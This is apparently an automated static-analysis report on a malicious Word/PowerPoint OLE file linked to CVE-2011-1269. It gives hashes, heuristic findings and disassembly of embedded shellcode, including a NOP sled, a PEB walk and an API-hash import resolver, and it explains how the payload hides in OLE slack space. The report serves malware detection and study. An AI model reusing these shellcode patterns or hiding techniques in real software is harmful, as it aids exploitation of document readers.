Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 733a5dea192f55eb…

MALICIOUS

Office (OLE)

373.5 KB Created: 2006-01-25 08:30:00 Authoring application: Microsoft Office Word First seen: 2015-09-29
MD5: 83639f4d109042333c7eb9cc63b12320 SHA-1: 7e62b4375ef2d25f50ca2da885e3f729d4c6ff46 SHA-256: 733a5dea192f55eba6d14444185a556a084d162656c2bc365fbd9d7dbe4c9b04
400 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The sample is identified as malicious due to multiple high and critical heuristic firings, including the detection of a raw shellcode payload and a PowerPoint binary-format RCE payload associated with CVE-2011-1269 / MS11-036. The presence of a NOP sled, PEB access, and an API-hash resolver further indicate malicious shellcode. The OLE structure shows anomalies with a large slack region and an appended executable payload, suggesting it's a container for malicious code.

Heuristics 9

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family critical CVE likely PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • XOR-encoded strings (key 0xFF) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xFF: 'KERNEL32.DLL', 'KERNEL32.DLL', 'KERNEL32.DLL', 'KERNEL32.DLL', 'KERNEL32.DLL', 'ADVAPI32.DLL', 'ADVAPI32.DLL', 'ADVAPI32.DLL'
    Disassembly hidden — these bytes score as data, not coherent x86 code (1/3 branch targets land on an instruction boundary (33% coherence)).
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    x86 disassembly · validity: code (0.716) — 3/4 branch targets land on an instruction boundary (75% coherence)
    00000BEF  90                nop
00000BF0  90                nop
00000BF1  90                nop
00000BF2  90                nop
00000BF3  90                nop
00000BF4  90                nop
00000BF5  90                nop
00000BF6  90                nop
00000BF7  90                nop
00000BF8  90                nop
00000BF9  90                nop
00000BFA  90                nop
00000BFB  90                nop
00000BFC  90                nop
00000BFD  90                nop
00000BFE  90                nop
00000BFF  90                nop
00000C00  90                nop
00000C01  90                nop
00000C02  90                nop
00000C03  90                nop
00000C04  90                nop
00000C05  90                nop
00000C06  90                nop
00000C07  90                nop
00000C08  90                nop
00000C09  90                nop
00000C0A  90                nop
00000C0B  90                nop
00000C0C  90                nop
00000C0D  90                nop
00000C0E  90                nop
00000C0F  90                nop
00000C10  90                nop
00000C11  90                nop
00000C12  90                nop
00000C13  90                nop
00000C14  90                nop
00000C15  90                nop
00000C16  90                nop
00000C17  90                nop
00000C18  90                nop
00000C19  90                nop
00000C1A  90                nop
00000C1B  90                nop
00000C1C  90                nop
00000C1D  90                nop
00000C1E  90                nop
00000C1F  90                nop
00000C20  90                nop
00000C21  4e                dec esi
00000C22  56                push esi
00000C23  ff550c            call dword ptr [ebp + 0xc]
00000C26  55                push ebp
00000C27  8bec              mov ebp, esp
00000C29  51                push ecx
00000C2A  53                push ebx
00000C2B  8b7d08            mov edi, dword ptr [ebp + 8]
00000C2E  eb09              jmp 0xc39
00000C30  ff                .byte 0xff
00000C31  ff                .byte 0xff
00000C32  ff                .byte 0xff
00000C33  ff                .byte 0xff
00000C34  ff                .byte 0xff
00000C35  ff                .byte 0xff
00000C36  ff9090908b5d      call dword ptr [eax + 0x5d8b9090]
00000C3C  0c56              or al, 0x56
00000C3E  8b733c            mov esi, dword ptr [ebx + 0x3c]
00000C41  8b741e78          mov esi, dword ptr [esi + ebx + 0x78]
00000C45  03f3              add esi, ebx
00000C47  56                push esi
00000C48  8b7620            mov esi, dword ptr [esi + 0x20]
00000C4B  03f3              add esi, ebx
00000C4D  33c9              xor ecx, ecx
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: uncertain (0.675) — 3/6 branch targets land on an instruction boundary (50% coherence)
    00000B59  64a130000000      mov eax, dword ptr fs:[0x30]
00000B5F  8b400c            mov eax, dword ptr [eax + 0xc]
00000B62  8b701c            mov esi, dword ptr [eax + 0x1c]
00000B65  ad                lodsd eax, dword ptr [esi]
00000B66  8b7008            mov esi, dword ptr [eax + 8]
00000B69  81ec00070000      sub esp, 0x700
00000B6F  8bec              mov ebp, esp
00000B71  e912010000        jmp 0xc88
00000B76  5b                pop ebx
00000B77  33c9              xor ecx, ecx
00000B79  b10c              mov cl, 0xc
00000B7B  56                push esi
00000B7C  ff33              push dword ptr [ebx]
00000B7E  e8a3000000        call 0xc26
00000B83  89448d00          mov dword ptr [ebp + ecx*4], eax
00000B87  83c304            add ebx, 4
00000B8A  e2ef              loop 0xb7b
00000B8C  33f6              xor esi, esi
00000B8E  bfe8170100        mov edi, 0x117e8
00000B93  c74554f1bd0400    mov dword ptr [ebp + 0x54], 0x4bdf1
00000B9A  037d54            add edi, dword ptr [ebp + 0x54]
00000B9D  897558            mov dword ptr [ebp + 0x58], esi
00000BA0  83455804          add dword ptr [ebp + 0x58], 4
00000BA4  56                push esi
00000BA5  ff7558            push dword ptr [ebp + 0x58]
00000BA8  ff552c            call dword ptr [ebp + 0x2c]
00000BAB  3bc7              cmp eax, edi
00000BAD  740b              je 0xbba
00000BAF  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
00000BB6  7432              je 0xbea
00000BB8  eb                .byte 0xeb
  • PEB API-hash resolver high SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: uncertain (0.675) — 3/6 branch targets land on an instruction boundary (50% coherence)
    00000B59  64a130000000      mov eax, dword ptr fs:[0x30]
00000B5F  8b400c            mov eax, dword ptr [eax + 0xc]
00000B62  8b701c            mov esi, dword ptr [eax + 0x1c]
00000B65  ad                lodsd eax, dword ptr [esi]
00000B66  8b7008            mov esi, dword ptr [eax + 8]
00000B69  81ec00070000      sub esp, 0x700
00000B6F  8bec              mov ebp, esp
00000B71  e912010000        jmp 0xc88
00000B76  5b                pop ebx
00000B77  33c9              xor ecx, ecx
00000B79  b10c              mov cl, 0xc
00000B7B  56                push esi
00000B7C  ff33              push dword ptr [ebx]
00000B7E  e8a3000000        call 0xc26
00000B83  89448d00          mov dword ptr [ebp + ecx*4], eax
00000B87  83c304            add ebx, 4
00000B8A  e2ef              loop 0xb7b
00000B8C  33f6              xor esi, esi
00000B8E  bfe8170100        mov edi, 0x117e8
00000B93  c74554f1bd0400    mov dword ptr [ebp + 0x54], 0x4bdf1
00000B9A  037d54            add edi, dword ptr [ebp + 0x54]
00000B9D  897558            mov dword ptr [ebp + 0x58], esi
00000BA0  83455804          add dword ptr [ebp + 0x58], 4
00000BA4  56                push esi
00000BA5  ff7558            push dword ptr [ebp + 0x58]
00000BA8  ff552c            call dword ptr [ebp + 0x2c]
00000BAB  3bc7              cmp eax, edi
00000BAD  740b              je 0xbba
00000BAF  817d5800000100    cmp dword ptr [ebp + 0x58], 0x10000
00000BB6  7432              je 0xbea
00000BB8  eb                .byte 0xeb
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 382,425 bytes but its declared streams total only 60,983 bytes — 321,442 bytes (84%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.

Open this report in the interactive analyzer, or submit your own file for analysis.